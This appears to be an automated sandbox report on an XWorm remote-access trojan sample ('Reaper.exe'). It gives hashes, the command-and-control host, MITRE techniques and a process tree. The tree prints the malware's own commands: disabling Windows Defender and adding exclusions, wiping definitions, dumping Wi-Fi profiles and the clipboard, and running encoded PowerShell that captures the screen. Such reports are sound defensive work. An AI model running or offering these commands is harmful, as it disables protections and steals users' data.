xworm | d80f9618ef8369e54986f2abf564e5eeccf961d3ddaca515622412b1e4648d4c

Resubmissions

20-04-2024 17:13

240420-vrrwwadh2z 10

12-03-2024 21:36

10-03-2024 04:41

10-03-2024 04:40

10-03-2024 04:38

09-03-2024 07:38

Analysis

max time kernel
15s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
20-04-2024 17:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Reaper/Reaper/Reaper.exe
Size

8.3MB
MD5

79d145e3962e71bf725d15b4c0261dac
SHA1

bc9d7a5a347fcefe3b3b81136e83af294bd489f4
SHA256

0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d
SHA512

2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df
SSDEEP

196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg

Score

10^/10

xworm rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

l838.ddns.net:3232

Attributes

Install_directory
%AppData%
install_file
Runtime Broker.exe

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral6/memory/4804-102-0x0000000000C80000-0x0000000000C9A000-memory.dmp	family_xworm
C:\Windows\Runtime broker.exe	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeWindows Defender Smartscreen.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Windows Defender Smartscreen.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Reaper.exeRuntime broker.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	Reaper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation	Runtime broker.exe

Executes dropped EXE 4 IoCs

Processes:

Reaper.exeWindows Defender Smartscreen.exeRuntime broker.exeWindows Defender Smartscreen.exe

pid process

2028 Reaper.exe
4832 Windows Defender Smartscreen.exe
4804 Runtime broker.exe
1360 Windows Defender Smartscreen.exe

pid	process
2028	Reaper.exe
4832	Windows Defender Smartscreen.exe
4804	Runtime broker.exe
1360	Windows Defender Smartscreen.exe

Loads dropped DLL 20 IoCs

Processes:

Windows Defender Smartscreen.exeReaper.exe

pid	process
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
2028	Reaper.exe
2028	Reaper.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe
1360	Windows Defender Smartscreen.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI48322\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_lzma.pyd	upx
behavioral6/memory/1360-148-0x00007FFF3B970000-0x00007FFF3BF59000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_socket.pyd	upx
behavioral6/memory/1360-155-0x00007FFF4F300000-0x00007FFF4F32D000-memory.dmp	upx
behavioral6/memory/1360-164-0x00007FFF4EB10000-0x00007FFF4EB33000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\unicodedata.pyd	upx
behavioral6/memory/1360-177-0x00007FFF3B3B0000-0x00007FFF3B728000-memory.dmp	upx
behavioral6/memory/1360-181-0x00007FFF4F9A0000-0x00007FFF4F9C3000-memory.dmp	upx
behavioral6/memory/1360-182-0x00007FFF4F2E0000-0x00007FFF4F2F9000-memory.dmp	upx
behavioral6/memory/1360-184-0x00007FFF4EAE0000-0x00007FFF4EB0E000-memory.dmp	upx
behavioral6/memory/1360-185-0x00007FFF4EAC0000-0x00007FFF4EAD4000-memory.dmp	upx
behavioral6/memory/1360-186-0x00007FFF3B290000-0x00007FFF3B3AC000-memory.dmp	upx
behavioral6/memory/1360-183-0x00007FFF4F2C0000-0x00007FFF4F2D9000-memory.dmp	upx
behavioral6/memory/1360-179-0x00007FFF4F1C0000-0x00007FFF4F1CD000-memory.dmp	upx
behavioral6/memory/1360-175-0x00007FFF3B730000-0x00007FFF3B7E8000-memory.dmp	upx
behavioral6/memory/1360-173-0x00007FFF4F5F0000-0x00007FFF4F5FD000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_hashlib.pyd	upx
behavioral6/memory/1360-166-0x00007FFF3B7F0000-0x00007FFF3B967000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI48322\select.pyd	upx
behavioral6/memory/1360-149-0x00007FFF4F910000-0x00007FFF4F91F000-memory.dmp	upx
behavioral6/memory/1360-291-0x00007FFF3B970000-0x00007FFF3BF59000-memory.dmp	upx
behavioral6/memory/1360-292-0x00007FFF3B7F0000-0x00007FFF3B967000-memory.dmp	upx
behavioral6/memory/1360-341-0x00007FFF3B970000-0x00007FFF3BF59000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 ip-api.com
Drops file in Windows directory 1 IoCs

Processes:

Reaper.exe

description ioc process

File created C:\Windows\Runtime broker.exe Reaper.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

928 tasklist.exe
4692 tasklist.exe
3568 tasklist.exe
4932 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3740 systeminfo.exe

flow	ioc
19	ip-api.com

description	ioc	process
File created	C:\Windows\Runtime broker.exe	Reaper.exe

pid	process
928	tasklist.exe
4692	tasklist.exe
3568	tasklist.exe
4932	tasklist.exe

pid	process
3740	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4972	powershell.exe
4972	powershell.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
4376	powershell.exe
4376	powershell.exe
4376	powershell.exe
2664	powershell.exe
2664	powershell.exe
3652	powershell.exe
3652	powershell.exe
2664	powershell.exe
3996	powershell.exe
3996	powershell.exe
3652	powershell.exe
2820	powershell.exe
2820	powershell.exe
3996	powershell.exe
2820	powershell.exe
5432	powershell.exe
5432	powershell.exe
5432	powershell.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
4672	powershell.exe
4672	powershell.exe
4672	powershell.exe
5632	powershell.exe
5632	powershell.exe
5632	powershell.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

Processes:

Runtime broker.exepowershell.exepowershell.exetasklist.exetasklist.exepowershell.exetasklist.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4804	Runtime broker.exe
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	3568	tasklist.exe
Token: SeDebugPrivilege	4692	tasklist.exe
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	928	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3852	WMIC.exe
Token: SeSecurityPrivilege	3852	WMIC.exe
Token: SeTakeOwnershipPrivilege	3852	WMIC.exe
Token: SeLoadDriverPrivilege	3852	WMIC.exe
Token: SeSystemProfilePrivilege	3852	WMIC.exe
Token: SeSystemtimePrivilege	3852	WMIC.exe
Token: SeProfSingleProcessPrivilege	3852	WMIC.exe
Token: SeIncBasePriorityPrivilege	3852	WMIC.exe
Token: SeCreatePagefilePrivilege	3852	WMIC.exe
Token: SeBackupPrivilege	3852	WMIC.exe
Token: SeRestorePrivilege	3852	WMIC.exe
Token: SeShutdownPrivilege	3852	WMIC.exe
Token: SeDebugPrivilege	3852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3852	WMIC.exe
Token: SeRemoteShutdownPrivilege	3852	WMIC.exe
Token: SeUndockPrivilege	3852	WMIC.exe
Token: SeManageVolumePrivilege	3852	WMIC.exe
Token: 33	3852	WMIC.exe
Token: 34	3852	WMIC.exe
Token: 35	3852	WMIC.exe
Token: 36	3852	WMIC.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	3652	powershell.exe
Token: SeIncreaseQuotaPrivilege	3852	WMIC.exe
Token: SeSecurityPrivilege	3852	WMIC.exe
Token: SeTakeOwnershipPrivilege	3852	WMIC.exe
Token: SeLoadDriverPrivilege	3852	WMIC.exe
Token: SeSystemProfilePrivilege	3852	WMIC.exe
Token: SeSystemtimePrivilege	3852	WMIC.exe
Token: SeProfSingleProcessPrivilege	3852	WMIC.exe
Token: SeIncBasePriorityPrivilege	3852	WMIC.exe
Token: SeCreatePagefilePrivilege	3852	WMIC.exe
Token: SeBackupPrivilege	3852	WMIC.exe
Token: SeRestorePrivilege	3852	WMIC.exe
Token: SeShutdownPrivilege	3852	WMIC.exe
Token: SeDebugPrivilege	3852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3852	WMIC.exe
Token: SeRemoteShutdownPrivilege	3852	WMIC.exe
Token: SeUndockPrivilege	3852	WMIC.exe
Token: SeManageVolumePrivilege	3852	WMIC.exe
Token: 33	3852	WMIC.exe
Token: 34	3852	WMIC.exe
Token: 35	3852	WMIC.exe
Token: 36	3852	WMIC.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	5432	powershell.exe
Token: SeDebugPrivilege	4932	tasklist.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	5632	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Reaper.exeWindows Defender Smartscreen.exeWindows Defender Smartscreen.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4328 wrote to memory of 4972	4328	Reaper.exe	powershell.exe
PID 4328 wrote to memory of 4972	4328	Reaper.exe	powershell.exe
PID 4328 wrote to memory of 4972	4328	Reaper.exe	powershell.exe
PID 4328 wrote to memory of 2028	4328	Reaper.exe	Reaper.exe
PID 4328 wrote to memory of 2028	4328	Reaper.exe	Reaper.exe
PID 4328 wrote to memory of 2028	4328	Reaper.exe	Reaper.exe
PID 4328 wrote to memory of 4832	4328	Reaper.exe	Windows Defender Smartscreen.exe
PID 4328 wrote to memory of 4832	4328	Reaper.exe	Windows Defender Smartscreen.exe
PID 4328 wrote to memory of 4804	4328	Reaper.exe	Runtime broker.exe
PID 4328 wrote to memory of 4804	4328	Reaper.exe	Runtime broker.exe
PID 4832 wrote to memory of 1360	4832	Windows Defender Smartscreen.exe	Windows Defender Smartscreen.exe
PID 4832 wrote to memory of 1360	4832	Windows Defender Smartscreen.exe	Windows Defender Smartscreen.exe
PID 1360 wrote to memory of 2720	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2720	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2196	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2196	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1648	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1648	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 2720 wrote to memory of 5044	2720	cmd.exe	powershell.exe
PID 2720 wrote to memory of 5044	2720	cmd.exe	powershell.exe
PID 1360 wrote to memory of 3844	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 3844	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1876	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1876	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1420	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1420	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1876 wrote to memory of 3568	1876	cmd.exe	tasklist.exe
PID 1876 wrote to memory of 3568	1876	cmd.exe	tasklist.exe
PID 1360 wrote to memory of 3964	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 3964	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 5052	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 5052	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 3844 wrote to memory of 4692	3844	cmd.exe	tasklist.exe
PID 3844 wrote to memory of 4692	3844	cmd.exe	tasklist.exe
PID 1360 wrote to memory of 2124	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2124	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1124	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 1124	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 3628	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 3628	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2848	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2848	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2008	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2008	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 2196 wrote to memory of 4376	2196	cmd.exe	powershell.exe
PID 2196 wrote to memory of 4376	2196	cmd.exe	powershell.exe
PID 1648 wrote to memory of 2664	1648	cmd.exe	powershell.exe
PID 1648 wrote to memory of 2664	1648	cmd.exe	powershell.exe
PID 3964 wrote to memory of 928	3964	cmd.exe	tasklist.exe
PID 3964 wrote to memory of 928	3964	cmd.exe	tasklist.exe
PID 5052 wrote to memory of 3652	5052	cmd.exe	powershell.exe
PID 5052 wrote to memory of 3652	5052	cmd.exe	powershell.exe
PID 2848 wrote to memory of 3740	2848	cmd.exe	systeminfo.exe
PID 2848 wrote to memory of 3740	2848	cmd.exe	systeminfo.exe
PID 1420 wrote to memory of 3852	1420	cmd.exe	Conhost.exe
PID 1420 wrote to memory of 3852	1420	cmd.exe	Conhost.exe
PID 1360 wrote to memory of 2092	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 1360 wrote to memory of 2092	1360	Windows Defender Smartscreen.exe	cmd.exe
PID 2008 wrote to memory of 1668	2008	cmd.exe	reg.exe
PID 2008 wrote to memory of 1668	2008	cmd.exe	reg.exe
PID 1124 wrote to memory of 3996	1124	cmd.exe	powershell.exe
PID 1124 wrote to memory of 3996	1124	cmd.exe	powershell.exe
PID 3628 wrote to memory of 4884	3628	cmd.exe	tree.com
PID 3628 wrote to memory of 4884	3628	cmd.exe	tree.com

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

5556 attrib.exe
6000 attrib.exe

pid	process
5556	attrib.exe
6000	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4328

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2028

C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4832

C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'"
4⤵
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
- Suspicious use of WriteProcessMemory
PID:2196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4376

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
4⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:3844

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
- Suspicious use of WriteProcessMemory
PID:1420

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:2124

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:2096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:3740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
4⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
5⤵
PID:1668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG